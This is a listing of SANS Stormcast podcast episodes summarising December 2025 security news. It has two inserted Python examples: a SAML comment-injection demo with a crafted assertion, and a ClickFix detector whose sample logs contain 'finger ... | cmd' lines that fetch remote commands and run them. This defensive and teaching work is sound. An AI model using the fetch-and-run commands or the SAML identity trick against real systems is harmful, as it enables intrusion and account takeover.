

SANS Internet Stormcenter Daily Cyber Security Podcast (Stormcast)
Johannes B. Ullrich
A brief daily summary of what is important in information security. The podcast is published every weekday and is designed to get you ready for the day with a brief, usually five-minute, summary of current network-security-related events. The content is late-breaking, educational, and based on listener input as well as on input received by the SANS Internet Stormcenter. You may submit questions and comments via our contact form at https://isc.sans.edu/contact.html .
Episodes

Dec 19, 2025 • 5min
SANS Stormcast Friday, December 19th, 2025: Less Vulnerable Devices; Critical OneView Vulnerability; Trufflehog finds JWTs
There is a positive trend in 2025: fewer internet-exposed industrial control systems and a significant drop in servers still offering outdated SSL versions. The decline raises the question of whether it reflects cleanup efforts or simply aging devices going offline. A critical vulnerability in HPE's OneView software allows unauthenticated remote code execution and needs urgent patching. Meanwhile, TruffleHog now detects JWTs and can validate them against public keys, which tells you whether a leaked token is genuine rather than merely flagging a JWT-shaped string.

Dec 18, 2025 • 6min
SANS Stormcast Thursday, December 18th, 2025: More React2Shell; SonicWall and Cisco Patch; Updated Chrome Advisory
Exploit trends are shifting, with attackers homing in on applications that were previously overlooked. Cisco issues an urgent warning that its email appliances are exposed to a known vulnerability. SonicWall is in the spotlight due to a local privilege escalation flaw that is now being actively exploited. Google has assigned a CVE to the previously undocumented vulnerability linked to WebGPU, but no patch is available yet. The episode also covers best practices for securing administrative access, underscoring the need for robust protection.

Dec 17, 2025 • 7min
SANS Stormcast Wednesday, December 17th, 2025: Beyond RC4; Forticloud SSO Vuln Exploited; FortiGate SSO Exploited
Microsoft is moving away from RC4 for Windows authentication and provides guidance for a smooth transition. FortiCloud's SSO vulnerability is being actively exploited, and urgent patching is recommended. Three vulnerabilities were also disclosed in FreePBX, including an authentication bypass that could lead to remote code execution. Hardening steps are emphasized for potentially compromised FortiGate devices, where attackers could have read sensitive configuration data.

Dec 16, 2025 • 6min
SANS Stormcast Tuesday, December 16th, 2025: Current React2Shell Example; SAML woes; MSMQ issues after patch
React2Shell exploits are surging in honeypots, with notable variation in how the malware is delivered. SAML authentication is revisited: when two XML parsers in the authentication path disagree on how to read the same assertion, the mismatch can become a security vulnerability. Attackers also misuse signed SAML error messages for fraud. Finally, Microsoft Message Queuing failures have been traced to a recent update, illustrating the cascading effects of software patches.
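The XML parser mismatch behind the SAML item above, as an added worked example that is not from the podcast or the ISC: a constructed NameID containing an XML comment is read by two Python standard-library parsers. ElementTree discards comments and joins the text around them, which is also what comment-excluding canonicalization feeds to an XML-DSig check, so a signature over the full identifier still verifies; a DOM consumer that reads only the first text node stops at the comment and logs the user in under a shorter, different identity. The fragment, function names and the defensive check are mine.

```python
"""Added example: an XML parser differential in a SAML-style assertion.

Constructed fragment, not from any real IdP. The comment inside NameID is
what an attacker would add after obtaining a legitimately signed assertion
for 'admin@example.com.attacker.example'. Canonicalization that excludes
comments (the usual choice for XML-DSig) still reproduces the original
text, so the signature verifies, while a consumer that reads only the
first text node sees 'admin@example.com'.
"""
import xml.etree.ElementTree as ET
from xml.dom import minidom

SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"

# Constructed sample assertion fragment.
ASSERTION = (
    f'<saml:Assertion xmlns:saml="{SAML_NS}">'
    "<saml:Subject><saml:NameID>"
    "admin@example.com<!---->.attacker.example"
    "</saml:NameID></saml:Subject></saml:Assertion>"
)


def nameid_etree(xml_text: str) -> str:
    """ElementTree drops comments and joins the text around them."""
    root = ET.fromstring(xml_text)
    return root.find(".//saml:NameID", {"saml": SAML_NS}).text


def _nameid_dom(xml_text: str):
    """Locate the NameID element with the DOM parser (comments preserved)."""
    return minidom.parseString(xml_text).getElementsByTagName("saml:NameID")[0]


def nameid_dom_first_text(xml_text: str) -> str:
    """A DOM consumer reading only firstChild stops at the comment."""
    return _nameid_dom(xml_text).firstChild.data


def nameid_dom_all_text(xml_text: str) -> str:
    """Joining every text node gives the same value the signer saw."""
    node = _nameid_dom(xml_text)
    return "".join(c.data for c in node.childNodes if c.nodeType == c.TEXT_NODE)


def nameid_has_comment(xml_text: str) -> bool:
    """Defensive check: refuse any NameID that carries a comment node."""
    node = _nameid_dom(xml_text)
    return any(c.nodeType == c.COMMENT_NODE for c in node.childNodes)


if __name__ == "__main__":
    print("ElementTree :", nameid_etree(ASSERTION))
    print("DOM first   :", nameid_dom_first_text(ASSERTION))
    print("DOM joined  :", nameid_dom_all_text(ASSERTION))
    print("has comment :", nameid_has_comment(ASSERTION))
```

The fix is not to pick a "better" parser but to make the identity extraction read exactly what the signature covered: join all text nodes (or canonicalize the subtree the same way the verifier did) and reject assertions whose NameID contains comments or other non-text children.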

Dec 15, 2025 • 7min
SANS Stormcast Monday, December 15th, 2025: DLL Entry Points; ClickFix and Finger; Apple Patches
DLL entry points can run code the moment a library is loaded, which is why attackers use them to execute malicious code. The ongoing ClickFix attacks use the finger protocol to deliver malware. Apple's December 2025 patches address critical vulnerabilities across its platforms. New security concerns in React Server Components include denial of service and source code exposure. Network mitigation strategies to prevent unauthorized access are also covered.
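A detection for the finger-based ClickFix delivery mentioned above, added here and not part of the podcast: it scans process command lines for finger invocations whose output is piped into a command interpreter, which is how a response fetched over TCP/79 becomes executed commands, and extracts the host the payload was pulled from. The sample lines are constructed in a Sysmon-like CommandLine layout (an assumption), and the regexes and interpreter list are mine.

```python
"""Added example: spot finger-based payload retrieval in process command lines.

The ClickFix campaign discussed above fetches commands over the finger
protocol (TCP/79) and pipes the response into a shell. Constructed sample
lines below imitate a Sysmon Event ID 1 CommandLine export (assumed layout).
"""
import re
from dataclasses import dataclass
from typing import List

# finger or finger.exe followed by [user]@host; the user part may be empty.
FINGER_RE = re.compile(
    r"\bfinger(?:\.exe)?\s+(?P<target>[\w.\-]*@[\w.\-]+)", re.IGNORECASE
)

# Interpreters that would execute text read from stdin (assumed list).
INTERPRETERS = {"cmd", "powershell", "pwsh", "wscript", "cscript", "mshta"}


@dataclass
class FingerHit:
    line_no: int
    target: str           # user@host as passed to finger
    piped_to_shell: bool  # True when a later pipe stage is an interpreter


def _basename(token: str) -> str:
    """Strip quotes, path and .exe so 'C:\\x\\cmd.exe' compares as 'cmd'."""
    token = token.strip('"\'').replace("\\", "/").rsplit("/", 1)[-1].lower()
    return token[:-4] if token.endswith(".exe") else token


def piped_into_interpreter(cmdline: str, start: int) -> bool:
    """Does any pipe stage after offset `start` begin with an interpreter?"""
    for stage in cmdline[start:].split("|")[1:]:
        tokens = stage.split()
        if tokens and _basename(tokens[0]) in INTERPRETERS:
            return True
    return False


def scan(lines: List[str]) -> List[FingerHit]:
    """Return one hit per line that invokes finger with a user@host target."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = FINGER_RE.search(line)
        if not m:
            continue
        hits.append(FingerHit(n, m.group("target"),
                              piped_into_interpreter(line, m.end())))
    return hits


def c2_hosts(hits: List[FingerHit]) -> List[str]:
    """Hosts contacted by finger runs whose output fed a shell."""
    return sorted({h.target.split("@", 1)[1] for h in hits if h.piped_to_shell})


# Constructed sample telemetry (not real logs).
SAMPLE_LOG = [
    r'CommandLine: "C:\Windows\System32\cmd.exe" /c finger update@203.0.113.10 | cmd',
    r'CommandLine: finger.exe alice@finger.example.org',
    r'CommandLine: powershell.exe -nop -w hidden -c "Get-Date"',
    r'CommandLine: cmd.exe /c finger.exe bootstrap@c2.invalid | more +1 | cmd',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        verdict = "SUSPICIOUS" if hit.piped_to_shell else "review"
        print(f"line {hit.line_no}: finger -> {hit.target} [{verdict}]")
    print("payload hosts:", c2_hosts(scan(SAMPLE_LOG)))
```

Plain finger use is rare enough on modern Windows that even the unpiped hit (line 2) deserves a look; the piped hits are the ones to alert on, and the extracted hosts go straight into a block list or a proxy log search for other victims.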

Dec 12, 2025 • 7min
SANS Stormcast Friday, December 12th, 2025: Local AI Models; Mystery Chrome 0-Day; SOAPwn Attack
Running Google's Gemma 3 model on modest hardware makes local AI experimentation accessible. A Google Chrome 0-day is being exploited in the wild even though it has not yet received a CVE. The SOAPwn attack exposes .NET applications to serious threats through HTTP client proxies. The findings matter for developers and defenders alike.

Dec 11, 2025 • 7min
SANS Stormcast Thursday, December 11th, 2025: Possible CVE-2024-9042 variant; react2shell exploits; notepad++ update hijacking; macOS priv escalation
A potential new variant of the exploit for the Kubernetes OS command injection (CVE-2024-9042) has been spotted. React2Shell is revisited, with tactical advice on filtering Next.js headers. The recent Notepad++ update hijack underlines the importance of verifying software signatures. A new privilege escalation vulnerability in macOS remains unpatched.

Dec 10, 2025 • 8min
SANS Stormcast Wednesday, December 10th, 2025: Microsoft, Adobe, Ivanti, Fortinet, and Ruby patches.
Patch Tuesday brings crucial security updates from Microsoft, fixing 57 flaws, some of them actively exploited. Adobe addresses vulnerabilities in ColdFusion and Acrobat. Ivanti fixes a critical stored XSS issue in its Endpoint Manager, and Fortinet patches a cryptographic flaw allowing SSO bypass. Finally, the ruby-saml library receives a patch for an incomplete fix of earlier vulnerabilities.

Dec 9, 2025 • 6min
SANS Stormcast Tuesday, December 9th, 2025: nanoKVM Vulnerabilities; Ghostframe Phishing; WatchGuard Advisory
nanoKVM devices have security problems including insecure firmware updates and weak passwords. The Ghostframe phishing kit evades detection by using unique subdomains. WatchGuard has released a significant update addressing multiple vulnerabilities, including a notable denial-of-service risk. Flaws and mitigations are discussed for each.

Dec 8, 2025 • 6min
SANS Stormcast Monday, December 8th, 2025: AutoIT3 FileInstall; React2Shell Update; Tika Vuln
Malicious scripts are using AutoIT3's FileInstall to drop shellcode during execution, a new obfuscation technique. The React2Shell vulnerability has set off a frantic race to patch, with aggressive scanning and exploit attempts. A recently patched XXE flaw in the Apache Tika library highlights the importance of updating software, especially for PDF parsing.


